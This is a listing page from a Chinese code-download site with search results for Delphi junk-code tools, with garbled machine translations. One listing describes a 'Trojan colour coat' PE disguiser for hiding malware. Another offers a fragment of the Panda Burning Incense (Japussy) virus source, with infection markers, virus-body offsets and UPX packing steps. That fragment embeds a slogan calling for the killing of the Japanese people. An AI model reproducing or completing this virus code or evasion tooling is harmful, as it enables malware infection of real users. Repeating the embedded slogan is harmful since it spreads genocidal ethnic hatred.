Description: 一个简单的花指令伪装器--Delphi版木马彩衣
说明:
这两天闲着无聊研究了一下PE结构,参考 fi7ke 的PE伪装器[花指令添加器] http://forum.wrsky.com/viewthread.php?tid=1927&fpage=1 一文写了一个简单的花指令伪装器,由于本人手中的花指令有限,目前只支持四种格式伪装,支持自定义区段名和大小,目前不支持软件本身重复加壳,但可使用其他加壳软件加壳,区段d大小最小为512个字节,希望大家继续完善,补充更多的花指令,加上可以自身重复加壳功能。
-A simple directive to spend camouflage device- Delphi version Technicolor Dreamcoat Trojan Description: This two-day study of idle boredom, then the structure of PE, the PE reference fi7ke camouflage device [junk code to add device] http://forum.wrsky.com/ viewthread.php? tid = 1927 Platform: |
Size: 19456 |
Author:tom |
Hits:
Description: 利用花指令扰乱Cracker,以达到保护软件的作用。
本工具可以自定义花指令,有三种模式,如下:
1、随机插入花指令
2、指定插入固定的花指令
3、全部插入花指令
使用方法:
1、请自行在 JunkData.mdb 数据库中添加花指令
2、在您要放花指令的地方写:{$F Junk}
3、{$F Junk} 为花指令标记
4、用本工具处理后,重新编译即可。-Disrupt the use of junk code Cracker, in order to achieve the role of protection software. This tool can customize the junk code, there are three modes, as follows: 1, randomly insert junk code 2, the designated fixed insert junk code 3, the full insert junk code to use: 1, your own database in JunkData.mdb add junk code 2, in the command you want to put flowers where to write: ($ F Junk) 3, ($ F Junk) tag for flower orders 4, after treatment with this tool, you can re-compile. Platform: |
Size: 711680 |
Author:长毛 |
Hits:
Description:
熊猫烧香原代码
熊猫烧香, 十六进制, Windows, 源代码, 字符串
熊猫烧香源代码
program Japussy
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}
const
HeaderSize = 82432 //病毒体的大小
IconOffset = EB8 //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912 //Upx压缩过病毒体的大小
IconOffset = BC //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = E8 //PE文件主图标的大小--744字节
IconTail = IconOffset + IconSize //PE文件主图标的尾部
ID = 444444 //感染标记
//垃圾码,以备写入
Catchword = If a race need to be killed out, it must be Yamato. +
If a country need to be destroyed, it must be Japan! +
***
{$R *.RES}
function : Integer): Integer-Panda original code Panda burning incense, hexadecimal, Windows source code, string the panda source code program Japussy uses Windows, the SysUtils the Classes, Graphics, ShellAPI {, Registry} const HeaderSize = 82 432 // virions the the size of IconOffset = EB8 // PE file main icon offset// in the above compile my Delphi5 SP1 size, other versions of Delphi may be different// Find 2800000020 hexadecimal string can be found in the main icon the offset {HeaderSize = 38912 // Upx compression over the the virus body size IconOffset = BC // Upx compressed PE file offset of the main icons the// Upx 1.24W Usage: upx-9- 8086 Japussy. exe} IconSize = E8 // PE file main icon size the- 744 the byte IconTail = IconOffset+ IconSize // tail of the PE file main icon ID = 444 444 // infection markers// junk yard to prepare written Catchword = ' If a race need to be killed out, it must be Yamato.' +' If a country need to be destroyed, it must be Japan! ' +' *** {$ R*. RES} function: Platform: |
Size: 4096 |
Author:炎热 |
Hits:
Search - delphi junk code